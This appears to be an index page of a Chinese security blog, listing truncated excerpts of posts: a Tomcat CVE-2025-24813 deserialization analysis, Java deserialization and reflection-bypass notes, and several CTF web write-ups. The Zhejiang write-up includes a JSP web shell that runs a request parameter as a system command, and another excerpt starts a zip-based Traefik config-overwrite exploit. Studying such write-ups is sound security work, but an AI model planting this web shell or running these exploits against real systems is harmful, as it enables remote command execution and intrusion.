CVE-2025-24813 Tomcat session 反序列化分析
CVE-2025-24813 Tomcat session 反序列化分析受影响版本1239.0.0.M1 <= tomcat <= 9.0.9810.1.0-M1 <= tomcat <= 10.1.3411.0.0-M1 <= tomcat <= 11.0.2
漏洞条件123应用程序启用了DefaultServlet写入功能,该功能默认关闭应用支持了 partial PUT 请求,能够将恶意的序列化数据写入到会话文件中,该功能默认开启应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置,需要额外配置
漏洞复现使用的是apache-tomcat-9.0.98版本。https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip
在conf/context.xml中,添加如下配置,启用session写入功能
123<Manager className\="org.apache.catalina.ses ...
TIMECapsule & justDeserialize 学习动态代理
TIMECapsule & justDeserialize 学习动态代理写在最前面
两场比赛的java题目都是属于那种,修复很好修但是很难打
ccb半决赛修复的问题给我很大的教训,改过来之后软件赛在华东赛区拿下fix一血二血
FIX修复的时候需要注意
服务需要手动kill掉对应的题目进程
服务重启的时候需要是使用nohup后台启动,不然当fix的进程被杀死,就会导致启动的服务挂掉,导致修复失败
给出一题的修复脚本
123456#!/bin/shpkill -9 dotnetrm /app/RazorCor.dllmv RazorCor.dll /app/RazorCor.dllnohup dotnet /app/RazorCor.dll &
TIMECapsule动态代理 代理类在程序运行时创建的代理方式被成为动态代理。代理类并不是在Java代码中定义的,而是在运行时根据我们在Java代码中的“指示”动态生成的。相比于静态代理, 动态代理的优势在于可以很方便的对代理类的函数进行统一的处理,而不用修改每个代理类中的方法。
Java 代理模式详解 | Ja ...
Fury反序列化
Fury反序列化
网上没找到相关的文章,自己瞎几把分析玩的
官方文档如下
https://fury.apache.org/zh-CN/docs/guide/java_object_graph_guide
依赖
1234567<dependencies> <dependency> <groupId>org.apache.fury</groupId> <artifactId>fury-core</artifactId> <version>0.10.0</version> </dependency> </dependencies>
序列化fury提供了一种不同于jdk原生序列化的方式,被序列化的类不需要实现序列化的接口,直接就可以序列化
例子:序列化的类
12345678910111213141516171819202122232425262728293031323334 ...
Jdk17 反射限制与绕过
Jdk17 反射限制与绕过反射的实现12345678910111213141516171819@CallerSensitive @ForceInline // to ensure Reflection.getCallerClass optimization @IntrinsicCandidate public Object invoke(Object obj, Object... args) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException { if (!override) { Class<?> caller = Reflection.getCallerClass(); checkAccess(caller, clazz, Modifier.isStatic(modifiers) ? null : o ...
2025 N1CTF Junior
脖子疼
2025 N1CTF Juniortraefik存在任意文件解压
这里可以解压到任意目录下,覆盖原来有的内容
这里可以覆盖他的反代配置,然后把flag路由暴露出来
这里限制了flag访问必须要是本地ip,需要伪造
可以设置yaml,中间设置一个中间件,修改所有经过的xff头
exp如下
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950import zipfile if __name__ == "__main__": try: binary = '''# Dynamic configurationhttp: middlewares: set-x-forwarded-for: headers: customRequestHeaders: X-Forwarded-For: "127.0.0.1" ...
2025SUCTF
2025SUCTF -WEB
死了
SU_photogallery可以上传一个zip压缩包
404页面长得像php-s 启动的服务,搜搜相关漏洞
https://blog.csdn.net/Kawakaze_JF/article/details/133046885
找到了这个,成功读取了代码
源代码如下
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150 ...
2024 总结
2024 总结现在是2024-12-17 在某节实验课上摸鱼
前段时间参加了ciscn x 长城杯 的全国初赛,初赛和队友做了两个签到,由于没有misc手,后面就去做威胁分析和流量取证了,做了5题,第六题的时候猜那个挂载的存活,看不懂只能dump字符串出来一个个猜测,结果还没猜对(沟槽的),然后就结束了,这里感谢carbofish师傅的带飞。
今年还是很有收获的,年初的时候爆学了一段时间的jvav,然后参加了一些比赛。然后就是各种的打比赛,复现,打比赛,复现。有段时间不知道咋回事,有复现不完的题目,复现到后面自己都看的想吐了(和最近刚刚换一下,国赛题还没复现QAQ 不知道什么时候去复现。
今年圆了去年的梦,成功进入了ciscn的决赛,去年剃头的巅峰极客,今年也成功打进了决赛,虽然因为ycb的时间冲突,没能成功去到线下,不过也很满意了。今年还在newstarctf客串了一回出题人,然后加入了V&N,遇到了很多厉害的师傅。
随便写点吧,寒假再更新了,最近要狠狠学习编译原理和考研英语了,期末要挂了。。。
2024 强网杯 web
2024 强网杯 web
最近有点忙 比赛题目好多都没复现 欸
最后做题情况如下
php
platform给了源代码
1234567891011121314151617181920212223242526<?phpsession_start();require 'user.php';require 'class.php';$sessionManager = new SessionManager();$SessionRandom = new SessionRandom();if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password']; $_SESSION['user'] = $username; if (!isset($_SESSION[' ...
2024浙江省省赛
2024浙江省省赛 web初赛
这次比赛题目还是比较简单的 我上来就拿了两个血
可惜第三题使用xml加载内存马的时候 脑袋抽了没想出来 可惜了
最后第11名 欸可惜
easyjs
点名了存在原型链污染
污染id=1 的isAdmin为true就行 得到flag
这题不污染也行 乐
hack memory不知道应该干啥 扫一下
直接上传一句话就行
12345678910<% if("poc".equals(request.getParameter("pwd"))){java.io.InputStream in =Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1; byte[] b = new byte[2048]; out.print("<pre>");while((a=in.read(b))!=-1){out.println(new St ...
2024强网拟态 web
2024强网拟态 web
我们A1natas最后获得了第30 感觉没希望进线下了 尽力了
不过开心的是我ak了web方向的题目
ez_picker/register存在原型链污染 可以污染任意的黑白名单
这里在register的时候 进行了merge操作
写个简单的demo
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960import sanicfrom sanic import text, Sanic, Request, responsefrom key import secret_keyapp = Sanic("test")users=[]safe_modules = { 'math', 'datetime', 'json', 'collections' ...